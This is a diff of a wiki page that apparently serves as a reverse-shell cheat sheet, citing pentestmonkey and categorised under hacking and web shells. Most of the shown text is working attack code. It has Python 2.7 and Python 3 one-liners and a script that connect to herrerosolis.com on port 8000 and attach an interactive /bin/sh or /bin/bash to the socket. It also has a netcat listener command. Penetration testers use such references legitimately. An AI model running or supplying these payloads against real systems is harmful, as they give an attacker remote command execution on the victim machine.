| Line 1: |
Line 1: |
| − | http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | + | <references />http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet |
| | | | |
| | https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ | | https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ |
| Line 19: |
Line 19: |
| | ===Python 2.7 (Linux)=== | | ===Python 2.7 (Linux)=== |
| | <syntaxhighlight lang="python"> | | <syntaxhighlight lang="python"> |
| − | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | + | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("herrerosolis.com", 8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
| | </syntaxhighlight><syntaxhighlight lang="python"> | | </syntaxhighlight><syntaxhighlight lang="python"> |
| | import socket,subprocess,os; | | import socket,subprocess,os; |
| | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) | | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) |
| − | s.connect(("ipcheck.dyndns.org",8080)) | + | s.connect(("herrerosolis.com",8000)) |
| | os.dup2(s.fileno(),0) | | os.dup2(s.fileno(),0) |
| | os.dup2(s.fileno(),1) | | os.dup2(s.fileno(),1) |
| | os.dup2(s.fileno(),2) | | os.dup2(s.fileno(),2) |
| | p=subprocess.call(["/bin/sh","-i"]) | | p=subprocess.call(["/bin/sh","-i"]) |
| | + | </syntaxhighlight> |
| | + | |
| | + | ==Python 3== |
| | + | <syntaxhighlight lang="bash"> |
| | + | python3 -c 'import socket,os,pty; s=socket.create_connection(("herrerosolis.com",8000)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; os.putenv("TERM","xterm-256color"); pty.spawn("/bin/bash")' |
| | </syntaxhighlight> | | </syntaxhighlight> |
| | | | |
| Line 76: |
Line 81: |
| | | | |
| | </syntaxhighlight> | | </syntaxhighlight> |
| | + | |
| | + | == Reverse Shell Listener == |
| | + | <syntaxhighlight lang="bash"> |
| | + | nc -lvp 8000 -k |
| | + | </syntaxhighlight> |
| | + | [[Category:Hacking]] |
| | + | [[Category:WebShell]] |
| | + | [[Category:WebShells]] |